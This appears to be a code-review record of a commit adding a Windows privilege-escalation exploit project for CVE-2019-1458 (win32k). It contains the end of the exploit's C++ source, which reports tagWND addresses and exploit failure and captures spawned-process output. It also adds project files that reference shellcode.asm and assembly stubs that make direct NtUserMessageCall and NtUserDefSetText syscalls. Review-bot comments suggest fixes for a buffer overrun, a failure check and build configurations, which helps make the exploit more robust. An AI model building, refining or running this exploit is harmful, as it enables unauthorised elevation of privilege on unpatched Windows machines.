if (!ReadFile(hRead, buf + br, 4000, &bytesRead, NULL))
break;
br += bytesRead;
}
puts("===============================");
puts((char*)buf);
fflush(stdout);
fflush(stderr);
CloseHandle(hRead);
CloseHandle(pi.hProcess);
ExitProcess(0);
}
else
{
printf("[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx\n", testtagWND, tagWND, GetLastError());
ExitProcess(-5);
}
}
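Review bot: The output-capture loop after `CreateProcessW` writes into the fixed `byte buf[40960]` at `buf + br` in 4000-byte `ReadFile` calls without ever comparing `br` against `sizeof(buf)`, so a child process that prints more than roughly 40 KB overruns the stack buffer; bound it before the read, e.g. `if (br + 4000 > sizeof(buf) - 1) break;`, or read into a growable heap buffer. `puts((char*)buf)` also depends on the buffer staying NUL-terminated, which only holds while at least one byte is left unfilled. Separately, the `sploitWnd == INVALID_HANDLE_VALUE` test after `CreateWindowEx` can never fire, because `CreateWindowEx` reports failure with `NULL`; compare against `NULL` as the earlier `hwnd == NULL` check does.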


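--- a/PATH-NOT-SHOWN.vcxproj
+++ b/PATH-NOT-SHOWN.vcxproj
@@ -0,0 +1,159 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{FD32BB28-7082-41EA-B221-26E8D10A1CC9}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>cve20191458</RootNamespace>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>Application</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<PlatformToolset>v120</PlatformToolset>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<LinkIncremental>true</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<LinkIncremental>false</LinkIncremental>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>
+</PrecompiledHeader>
+<Optimization>MaxSpeed</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<SDLCheck>true</SDLCheck>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<DelayLoadDLLs>
+</DelayLoadDLLs>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="Source.cpp" />
+</ItemGroup>
+<ItemGroup>
+<MASM Include="shellcode.asm" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+</ImportGroup>
+</Project>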


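--- a/PATH-NOT-SHOWN.vcxproj.filters
+++ b/PATH-NOT-SHOWN.vcxproj.filters
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup>
+<Filter Include="Source Files">
+<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+</Filter>
+<Filter Include="Header Files">
+<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+</Filter>
+<Filter Include="Resource Files">
+<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+</Filter>
+</ItemGroup>
+<ItemGroup>
+<ClCompile Include="Source.cpp">
+<Filter>Source Files</Filter>
+</ClCompile>
+</ItemGroup>
+<ItemGroup>
+<MASM Include="shellcode.asm">
+<Filter>Source Files</Filter>
+</MASM>
+</ItemGroup>
+</Project>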


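--- a/PATH-NOT-SHOWN.vcxproj.user
+++ b/PATH-NOT-SHOWN.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<PropertyGroup />
+</Project>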


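--- a/PATH-NOT-SHOWN.asm
+++ b/PATH-NOT-SHOWN.asm
@@ -0,0 +1,22 @@
+_TEXT SEGMENT
+EXTERNDEF g_NtUserDefSetText_syscall:dword
+EXTERNDEF g_NtUserMessageCall_syscall:dword
+PUBLIC NtUserMessageCall
+NtUserMessageCall PROC
+mov r10, rcx
+mov eax, g_NtUserMessageCall_syscall
+syscall
+ret
+NtUserMessageCall ENDP
+PUBLIC NtUserDefSetText
+NtUserDefSetText PROC
+mov r10, rcx
+mov eax, g_NtUserDefSetText_syscall
+syscall
+ret
+NtUserDefSetText ENDP
+_TEXT ENDS
+END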
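Review bot: The NtUserMessageCall and NtUserDefSetText stubs are x64-only (they use rcx/r10 and the x64 syscall instruction), yet the project file added in the same commit appears to declare Debug|Win32 and Release|Win32 configurations and lists the MASM item unconditionally, so a Win32 build would presumably fail to assemble this file; the file itself says nothing about this. A one-line header comment would make the constraint explicit, e.g. `; x64 only: Windows x64 syscall convention (first arg rcx -> r10, number in eax); not valid for Win32 configurations`. The syscall numbers are taken from the two EXTERNDEF dword globals, which are presumably assigned at runtime by the C++ side, and the stubs do not check that they have been set, so a comment such as `; g_*_syscall must be populated before these stubs are called` next to the EXTERNDEF lines would help a reader. The rendered section shows 19 lines against a declared 22, so a few blank lines were likely dropped in rendering.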